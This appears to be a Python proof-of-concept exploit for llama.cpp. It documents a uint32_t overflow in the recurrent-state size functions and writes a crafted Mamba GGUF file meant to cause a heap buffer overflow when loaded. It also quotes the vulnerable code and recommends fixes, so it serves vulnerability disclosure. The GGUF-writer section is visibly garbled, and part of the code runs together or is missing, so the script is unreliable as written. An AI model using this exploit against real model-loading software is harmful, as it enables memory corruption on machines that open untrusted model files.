#!/usr/bin/env python3 """ PoC: uint32_t integer overflow in llama_hparams::n_embd_s() and n_embd_r() ===================================================================================== VULNERABILITY SUMMARY: In llama.cpp, the functions n_embd_s() and n_embd_r() in src/llama-hparams.cpp compute recurrent state buffer sizes using uint32_t arithmetic. When the product of attacker-controlled GGUF metadata values exceeds 2^32, silent integer overflow causes allocation of undersized buffers. Subsequent writes to these buffers during inference cause heap buffer overflow. AFFECTED FUNCTIONS (src/llama-hparams.cpp): 1. n_embd_s() line 158: return n_embd * wkv_head_size; [RWKV6/RWKV7] 2. n_embd_s() line 169: return ssm_d_state * ssm_d_inner; [Mamba/Mamba2] 3. n_embd_s() line 165: return n_embd_head_kda * n_embd_head_kda * n_head(); [Kimi KDA] 4. n_embd_r() line 134: return token_shift_count * n_embd; [RWKV6/RWKV7] 5. n_embd_r() line 139: return n_embd * (n_shortconv_l_cache-1); [LFM2] 6. n_embd_r() line 152: return (ssm_d_conv-1) * (ssm_d_inner + 2*ssm_n_group*ssm_d_state); [Mamba] ALLOCATION SITE (src/llama-memory-recurrent.cpp lines 94-95): ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size); ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size); Note: n_embd_r() returns uint32_t, mem_size is uint32_t, so the multiplication hparams.n_embd_r()*mem_size is ALSO in uint32_t and may overflow again before being widened to int64_t for ggml_new_tensor_1d. NO INPUT VALIDATION: There are no range checks on wkv_head_size, ssm_d_state, ssm_d_inner, n_shortconv_l_cache, n_embd_head_kda, or token_shift_count. Values are read directly from untrusted GGUF metadata into uint32_t fields. TRIGGER SEQUENCE: 1. llama_load_model_from_file() -> load_hparams() reads overflow-inducing values 2. load_tensors() loads model weights (tensors sized with int64_t, no overflow there) 3. llama_new_context_with_model() -> create_memory() -> llama_memory_recurrent() calls n_embd_s() / n_embd_r() with uint32_t overflow -> undersized allocation 4. During inference, recurrent state is written into the undersized buffer -> HEAP OOB ASAN DETECTION: Yes, ASan would detect the heap-buffer-overflow during inference when the recurrent state write exceeds the allocated buffer. The overflow at step 3 is silent (no UB in C/C++ for unsigned wrap-around), but the resulting OOB write at step 4 is detected by ASan. This script generates a minimal GGUF file demonstrating the vulnerability. """ import struct import sys import os import numpy as np # -------------------------------------------------------------------------- # Constants from GGUF specification # -------------------------------------------------------------------------- GGUF_MAGIC = 0x46554747 # "GGUF" as uint32 little-endian (bytes: 47 47 55 46) GGUF_VERSION = 3 # GGUF value types GGUF_TYPE_UINT32 = 4 GGUF_TYPE_FLOAT32 = 6 GGUF_TYPE_STRING = 8 GGUF_TYPE_ARRAY = 9 GGUF_TYPE_UINT8 = 0 # GGML tensor types GGML_TYPE_F32 = 0 UINT32_MAX = 0xFFFFFFFF def uint32_overflow(val): """Simulate uint32_t overflow (C unsigned wrap-around).""" return val & UINT32_MAX def analyze_overflow_scenarios(): """Print analysis of all overflow scenarios.""" print("=" * 78) print("OVERFLOW ANALYSIS FOR ALL VULNERABLE FUNCTIONS") print("=" * 78) # --- Scenario 1: RWKV6 n_embd_s() --- print("\n--- Scenario 1: RWKV6 n_embd_s() = n_embd * wkv_head_size ---") n_embd = 65537 wkv_head_size = 65537 correct = n_embd * wkv_head_size overflowed = uint32_overflow(correct) print(f" n_embd = {n_embd}") print(f" wkv_head_size = {wkv_head_size}") print(f" Correct product = {correct} (0x{correct:X})") print(f" uint32 overflow = {overflowed} (0x{overflowed:X})") print(f" Ratio = {correct / overflowed:.1f}x undersized") print(f" Correct buffer (1 seq, f32) = {correct * 4 / (1024**2):.1f} MiB") print(f" Overflow buffer (1 seq, f32) = {overflowed * 4 / (1024**2):.1f} MiB") # --- Scenario 2: Mamba n_embd_s() --- print("\n--- Scenario 2: Mamba n_embd_s() = ssm_d_state * ssm_d_inner ---") n_embd_mamba = 2 ssm_d_inner = 2 * n_embd_mamba # constraint: d_inner = 2 * n_embd ssm_d_state = (UINT32_MAX // ssm_d_inner) + 2 # just enough to overflow correct = ssm_d_state * ssm_d_inner overflowed = uint32_overflow(correct) print(f" n_embd = {n_embd_mamba}") print(f" ssm_d_inner = {ssm_d_inner} (= 2 * n_embd)") print(f" ssm_d_state = {ssm_d_state}") print(f" Correct product = {correct} (0x{correct:X})") print(f" uint32 overflow = {overflowed} (0x{overflowed:X})") print(f" Ratio = {correct / max(overflowed, 1):.1f}x undersized") # --- Scenario 3: Kimi KDA n_embd_s() --- print("\n--- Scenario 3: Kimi KDA n_embd_s() = n_embd_head_kda^2 * n_head ---") n_embd_head_kda = 11586 # 11586^2 * 32 > 2^32 n_head = 32 correct = n_embd_head_kda * n_embd_head_kda * n_head overflowed = uint32_overflow(correct) print(f" n_embd_head_kda = {n_embd_head_kda}") print(f" n_head = {n_head}") print(f" Correct product = {correct} (0x{correct:X})") print(f" uint32 overflow = {overflowed} (0x{overflowed:X})") if overflowed > 0: print(f" Ratio = {correct / overflowed:.1f}x undersized") else: print(f" Wraps to ZERO -- ggml_new_tensor_1d with size 0!") # --- Scenario 4: LFM2 n_embd_r() --- print("\n--- Scenario 4: LFM2 n_embd_r() = n_embd * (n_shortconv_l_cache - 1) ---") n_embd_lfm = 4096 n_shortconv_l_cache = 1048578 # n_embd * (1048578-1) = 4096 * 1048577 > 2^32 correct = n_embd_lfm * (n_shortconv_l_cache - 1) overflowed = uint32_overflow(correct) print(f" n_embd = {n_embd_lfm}") print(f" n_shortconv_l_cache = {n_shortconv_l_cache}") print(f" Correct product = {correct} (0x{correct:X})") print(f" uint32 overflow = {overflowed} (0x{overflowed:X})") print(f" Ratio = {correct / overflowed:.1f}x undersized") # --- Scenario 5: Mamba n_embd_r() complex --- print("\n--- Scenario 5: Mamba n_embd_r() = (d_conv-1)*(d_inner + 2*n_group*d_state) ---") ssm_d_conv = 5 ssm_d_inner_r = 512 ssm_n_group = 32768 ssm_d_state_r = 32769 subexpr = ssm_d_inner_r + uint32_overflow(2 * ssm_n_group * ssm_d_state_r) correct_sub = ssm_d_inner_r + 2 * ssm_n_group * ssm_d_state_r correct = (ssm_d_conv - 1) * correct_sub overflowed_sub = uint32_overflow(2 * ssm_n_group * ssm_d_state_r) overflowed = uint32_overflow((ssm_d_conv - 1) * uint32_overflow(ssm_d_inner_r + overflowed_sub)) print(f" ssm_d_conv = {ssm_d_conv}") print(f" ssm_d_inner = {ssm_d_inner_r}") print(f" ssm_n_group = {ssm_n_group}") print(f" ssm_d_state = {ssm_d_state_r}") print(f" 2*n_group*d_state = {2*ssm_n_group*ssm_d_state_r} (correct)") print(f" 2*n_group*d_state = {overflowed_sub} (uint32 overflow)") print(f" Full correct = {correct}") print(f" Full overflowed = {overflowed}") # --- Scenario 6: Double overflow at allocation site --- print("\n--- Scenario 6: Double overflow at allocation site (line 94-95) ---") print(" Even if n_embd_s() doesn't overflow, the multiplication") print(" n_embd_s() * mem_size on line 95 is ALSO in uint32_t!") n_embd_s_val = 65536 # legitimate n_embd_s value mem_size = 65537 correct = n_embd_s_val * mem_size overflowed = uint32_overflow(correct) print(f" n_embd_s() = {n_embd_s_val}") print(f" mem_size = {mem_size}") print(f" Correct = {correct} (0x{correct:X})") print(f" Overflowed = {overflowed} (0x{overflowed:X})") print(f" Ratio = {correct / max(overflowed, 1):.1f}x undersized") print("\n" + "=" * 78) # -------------------------------------------------------------------------- # GGUF binary writer (minimal, hand-crafted) # -------------------------------------------------------------------------- def write_gguf_string(f, s): """Write a GGUF string (uint64 length + bytes, no null terminator).""" encoded = s.encode('utf-8') f.write(struct.pack('", "", "a", "b"] write_gguf_kv_string_array(f, "tokenizer.ggml.tokens", tokens) write_gguf_kv_float32_array(f, "tokenizer.ggml.scores", [0.0] * len(tokens)) write_gguf_kv_int32_array(f, "tokenizer.ggml.token_type", [0] * len(tokens)) # Tensor info # NOTE: We write the correct shapes (which are very large for ssm_a, ssm_x) # but only provide stub data. This makes the file small but structurally valid. # A real exploit would need to provide full tensor data. data_offset = 0 for name, ndims, shape, dtype in tensors: write_gguf_string(f, name) f.write(struct.pack('= wkv_head_size. The minimum overflow case is: n_embd = 65537, wkv_head_size = 65537 n_embd_s() = 65537 * 65537 = 4295098369 -> wraps to 131073 in uint32 However, tensors like time_mix_key {n_embd, n_embd} = {65537, 65537} require ~16GB, making a compact PoC file impractical. """ n_embd = 65537 wkv_head_size = 65537 n_layer = 1 n_vocab = 4 time_mix_extra_dim = 32 time_decay_extra_dim = 64 ffn_size = 4 # minimal feed-forward size correct_n_embd_s = n_embd * wkv_head_size overflowed_n_embd_s = uint32_overflow(correct_n_embd_s) correct_n_embd_r = 2 * n_embd # token_shift_count defaults to 2 overflowed_n_embd_r = uint32_overflow(correct_n_embd_r) print(f"\n{'='*78}") print("RWKV6 OVERFLOW ANALYSIS") print(f"{'='*78}") print(f" n_embd: {n_embd}") print(f" wkv_head_size: {wkv_head_size}") print(f" n_embd_s() correct: {correct_n_embd_s} ({correct_n_embd_s * 4 / (1024**3):.1f} GiB as f32)") print(f" n_embd_s() overflowed: {overflowed_n_embd_s} ({overflowed_n_embd_s * 4 / (1024**2):.1f} MiB as f32)") print(f" Buffer undersized by: {correct_n_embd_s / overflowed_n_embd_s:.0f}x") print(f" n_embd_r() correct: {correct_n_embd_r} (no overflow)") print() # For RWKV6, key tensors and their sizes: print(" Key tensor sizes (showing why full PoC file is large):") print(f" token_embd {{n_embd, n_vocab}} = {{{n_embd}, {n_vocab}}} = {n_embd*n_vocab*4/(1024**2):.1f} MiB") print(f" time_mix_key {{n_embd, n_embd}} = {{{n_embd}, {n_embd}}} = {n_embd*n_embd*4/(1024**3):.1f} GiB") print(f" time_mix_first {{head_sz, n_embd/hs}} = {{{wkv_head_size}, {n_embd//wkv_head_size}}} = {wkv_head_size*(n_embd//wkv_head_size)*4/1024:.1f} KiB") print() # We don't actually create this file since the tensors would be huge. # The Mamba PoC above demonstrates the GGUF structure. print(" (RWKV6 GGUF file not generated -- tensor data would be ~16GB)") print(" The vulnerability is the same code path as Mamba, just different parameters.") def print_vulnerable_code(): """Print the exact vulnerable code for reference.""" print(f"\n{'='*78}") print("VULNERABLE CODE REFERENCES") print(f"{'='*78}") print(""" FILE: src/llama-hparams.cpp Line 131-134 (n_embd_r for RWKV): uint32_t llama_hparams::n_embd_r() const { if (wkv_head_size != 0) { return token_shift_count * n_embd; // OVERFLOW: uint32 * uint32 } Line 137-139 (n_embd_r for LFM2): if (n_shortconv_l_cache != 0) { return n_embd * (n_shortconv_l_cache - 1); // OVERFLOW: uint32 * uint32 } Line 152 (n_embd_r for Mamba): return (ssm_d_conv > 0 ? ssm_d_conv - 1 : 0) * (ssm_d_inner + 2*ssm_n_group*ssm_d_state); // OVERFLOW: multiple uint32 ops Line 155-158 (n_embd_s for RWKV): uint32_t llama_hparams::n_embd_s() const { if (wkv_head_size != 0) { return n_embd * wkv_head_size; // OVERFLOW: uint32 * uint32 } Line 161-165 (n_embd_s for Kimi KDA): if (n_embd_head_kda != 0) { return n_embd_head_kda * n_embd_head_kda * n_head(); // OVERFLOW: triple uint32 Line 169 (n_embd_s for Mamba): return ssm_d_state * ssm_d_inner; // OVERFLOW: uint32 * uint32 FILE: src/llama-memory-recurrent.cpp Line 94-95 (allocation with overflowed size): ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, hparams.n_embd_r()*mem_size); ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, hparams.n_embd_s()*mem_size); // DOUBLE OVERFLOW: n_embd_r()/n_embd_s() returns uint32_t, // multiplication with mem_size (uint32_t) can overflow AGAIN // before widening to int64_t parameter of ggml_new_tensor_1d FILE: src/llama-hparams.h All overflow-prone fields are uint32_t (no validation, no range checks): Line 44: uint32_t n_embd; Line 62: uint32_t n_shortconv_l_cache = 0; Line 99: uint32_t wkv_head_size = 0; Line 100: uint32_t token_shift_count = 2; Line 133: uint32_t ssm_d_conv = 0; Line 134: uint32_t ssm_d_inner = 0; Line 135: uint32_t ssm_d_state = 0; Line 137: uint32_t ssm_n_group = 0; Line 140: uint32_t n_embd_head_kda = 0; """) def print_fix_recommendation(): """Print recommended fix.""" print(f"\n{'='*78}") print("RECOMMENDED FIX") print(f"{'='*78}") print(""" The fix should address both the return type and the arithmetic: 1. Change n_embd_r() and n_embd_s() return types from uint32_t to uint64_t: uint64_t llama_hparams::n_embd_r() const { if (wkv_head_size != 0) { return (uint64_t)token_shift_count * n_embd; } ... uint64_t llama_hparams::n_embd_s() const { if (wkv_head_size != 0) { return (uint64_t)n_embd * wkv_head_size; } ... 2. Fix the allocation site in llama-memory-recurrent.cpp: // Cast to int64_t before multiplying with mem_size ggml_tensor * r = ggml_new_tensor_1d(ctx, type_r, (int64_t)hparams.n_embd_r() * mem_size); ggml_tensor * s = ggml_new_tensor_1d(ctx, type_s, (int64_t)hparams.n_embd_s() * mem_size); 3. Add validation of hparams values after loading from GGUF: // Validate that products won't cause unreasonable allocations uint64_t embd_s = (uint64_t)ssm_d_state * ssm_d_inner; if (embd_s > INT32_MAX) { throw std::runtime_error("ssm state size overflow"); } """) def main(): print("=" * 78) print("PoC: uint32_t Integer Overflow in llama_hparams::n_embd_s() / n_embd_r()") print("Target: llama.cpp GGUF model loading (recurrent state buffer allocation)") print("=" * 78) # Analyze all overflow scenarios analyze_overflow_scenarios() # Print vulnerable code references print_vulnerable_code() # Generate Mamba PoC GGUF poc_dir = os.path.dirname(os.path.abspath(__file__)) mamba_poc_path = os.path.join(poc_dir, "poc_mamba_overflow.gguf") generate_mamba_poc_gguf(mamba_poc_path) # Analyze RWKV6 overflow generate_rwkv6_poc_gguf(None) # Print fix recommendation print_fix_recommendation() print(f"\n{'='*78}") print("SUMMARY") print(f"{'='*78}") print(""" VULNERABILITY: Integer overflow in n_embd_s()/n_embd_r() (uint32_t arithmetic) IMPACT: Heap buffer overflow via undersized recurrent state allocation. - Attacker crafts GGUF with metadata values whose product exceeds 2^32 - n_embd_s()/n_embd_r() silently wraps to a small value - Small buffer is allocated for recurrent state - During inference, full-sized state data is written to undersized buffer - Results in heap-buffer-overflow (detectable by ASan) SEVERITY: High - Triggered by loading a malicious GGUF file (no special flags needed) - Affects all recurrent architectures: Mamba, Mamba2, RWKV6, RWKV7, LFM2, Kimi - No input validation on the overflow-prone metadata fields - Overflow is in model loading path, not just inference ROOT CAUSE: uint32_t return type and arithmetic in n_embd_s()/n_embd_r() combined with lack of validation on GGUF metadata values. AFFECTED CODE: - src/llama-hparams.cpp: lines 134, 139, 146, 152, 158, 165, 169 - src/llama-memory-recurrent.cpp: lines 94-95 - src/llama-hparams.h: uint32_t field declarations (no range checks) """) if __name__ == "__main__": main()